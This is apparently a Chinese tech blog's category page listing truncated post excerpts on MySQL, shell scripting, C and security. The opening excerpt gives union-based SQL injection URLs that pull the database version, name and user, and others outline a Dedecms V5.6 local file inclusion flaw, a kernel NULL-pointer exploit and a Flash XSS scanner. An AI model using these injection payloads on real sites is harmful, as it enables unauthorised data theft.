按分类归档:技术专题
MYSQL高级注入实例
###########################################
#MYSQL高级注入实例
###########################################
———————————–系统信息 ——————————————-
http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 1,2,version(),4,5
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 1,2,database(),4,5
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 1,2,user(),4,5
——————————–爆数据库的…….
linux下C连接MySql
相对于Window下的设置,Linux要简单的很多。
1. 示例程序……
还是前段时间看dede代码的时候看到的,虽然很鸡肋,但也有点用,于是拖着没发;很无语的发现在t00ls被公布了,于是我稍微说一下之类本地包含漏洞的利用方法。
一、漏洞介绍
Dedecms V5.6 Final版本中的plus/carbuyaction.php文件中当dopost为return时,$code变量没有初始化,直接被带入了require once 语句中,由于后面限制了.php,从而只能导致本地包含漏洞。
二、漏洞细节
1、 plus/carbuyaction.php文件:
//漏洞出现下$dopost 为return的时候,$code变量没有被赋值,由于dedecms的全局机制可以任意给其赋值,从而带入包含,导致本……..
逐行读取文本文件的 shell 脚本
网上有很多 shell script 读文本文件的例子,但是都没有讲出故事的全部,只说了一半。举个例子,比如从一个 testfile 文件中读取如下格式的文本行:
$ vi testfile
ls -a -l /bin | sort
ls -a -l /bin | sort | wc
ls -a -l | grep sh | wc
ls -a -l
ls -a -l | sort | wc
最常见的一个 line by line 读…..
目录:
1、引言
2、NULL Pointer是如何引发OOPS的
3、如何Exploit
4、攻击实验
5、NULL Pointer与Selinux的关系
6、如何防御NULL Pointer漏洞
7、附录
1、引言
在最近一系列的Linux kernel本地溢出漏洞中, 大部分是由于内核引用一个空指针而引发的, 看NULL Pointers的一个示例:
当内核代码……..
在MySQL中拷贝表的几种方式
假如我们有以下这样一个表:
引用
id username password
———————————–
1 admin *************
2 sameer *************
3 stewart *************
CREATE TABLE IF NOT EXISTS `admin` (
`id` int(6) unsigned NOT NULL auto_increment,
`usern……
一段扫flash跨站的脚本
主要是扫ExternalInterface.call……
C与脚本的混合编程
在linux上写程序、做网管的人,或多或少都会几种脚本。脚本语言灵活的变量类型、强大的正则表达式处理能力,再加上linux系统本身的管道、
重定向以及丰富的命令行工具,让你编程起来游刃有余。
而C语言固然有种种优势,但不可否认,很多场合下,用脚本语言更为方便,比如我们将举例说明的对配置文件的处理。
先看看我们示例程序的任务:
假设我们有……
shell脚本中一些特殊符号
1、{} 大括号:
用法一:通配符扩展
eg: ls my_{finger,toe}s
这条命令相当于如下命令的组合:
ls my_fingers my_toes
eg: mkdir {userA,userB,userC}-{home,bin,data}
我们将…….
出现以下的信息:
Got an error: Connection error: Can’t connect to local MySQL server through socket ‘/var/lib/mysql/mysql.sock’
mysql.sock 突然消失算是常见的问题,如果是第一次安装MySQL才出现,那只要找出 mysql.sock 在哪里就可以了。
以上述的错误信息,mysql.sock 应该是…….
昨天晚上电脑里翻东西翻出来的,2008/7/17写的……
在MySQL中,有时候我们要选出N条记录,希望在结果中每条记录中加上一列标记该记录是第几条。
这个问题在oracle中,用rownum就可以简单的实现,但是在MySQL中,怎么去实现呢?下面给大家举一个例子:
select t.page,t.pv,@rn:=if(1=1,@rn+1,@rn) as rn
from
(select
page,
pv
from
m……..
我的饭否
